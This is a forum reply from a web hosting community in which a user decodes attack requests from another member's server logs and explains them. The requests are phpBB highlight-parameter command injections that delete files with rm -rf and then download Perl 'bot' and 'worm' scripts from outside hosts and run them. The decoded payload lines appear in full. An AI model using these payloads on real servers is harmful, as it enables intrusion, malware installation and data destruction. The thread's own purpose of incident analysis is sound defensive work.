GET /showthread.php?t=8240&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
is
GET /showthread.php?t=8240&rush=echo _START_; cd /tmp; rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/tmp/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/spool/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd  /usr/local/apache/proxy/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *; echo _END_&highlight=%2527.passthru($HTTP_GET_VARS[rush]).%2527

GET /printthread.php?t=440&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';
is
GET /printthread.php?t=440&rush=echo _START_; cd /tmp; wget security.cnc.net/bot.txt;wget security.cnc.net/worm.txt;perl worm.txt;rm worm.txt;perl bot.txt;rm bot.txt; echo _END_&highlight=%2527.passthru($HTTP_GET_VARS[rush]).%2527';
if run it does try to download a file into dirs and run it
in your case the try on "/usr/local/apache/proxy/" did work
so you got the files in there, unfortunatelly none of the URL's above works, so cant find out what the perl scripts do, guess download more files and do something else
someone might have used this script to exploit you
http://www.k-otik.com/exploits/20041...pbb2010.pl.php

your sure its vbb 3.0.5? looks like the phpbb highlight exploit code


Last edited by sehe; 01-12-2005 at 03:26 PM.
Reply

Related posts from TheWhir.com
Title Type Date Posted
US Government Discloses More Zero-Day Vulnerabilities than it Retains: Report Web Hosting News 2014-11-17 11:22:18
New Metadata Service Lets DigitalOcean Users Automate β€˜Droplet’ Provisioning Web Hosting News 2014-10-15 16:48:51
Open-Source Project Streisand Aims to Make Web Servers Immune to Censorship Web Hosting News 2014-07-25 12:39:07
Web Hosting Sales and Promos Roundup - February 14, 2014 Web Hosting News 2014-05-23 15:42:28
Windows Azure Offers Active Directory in General Availability Web Hosting News 2013-04-09 14:09:20


Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes
Postbit Selector

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off

Forum Jump
Login:
Log in with your username and password
Username:
Password:



Forgot Password?
WHT Host Brief Email:

We respect your privacy. We will never sell, rent, or give away your address to any outside party, ever.

Advertisement:
Web Hosting News:
WHT Membership
WHT Membership



 

X

Welcome to WebHostingTalk.com

Create your username to jump into the discussion!

WebHostingTalk.com is the largest, most influentual web hosting community on the Internet. Join us by filling in the form below.


(4 digit year)

Already a member?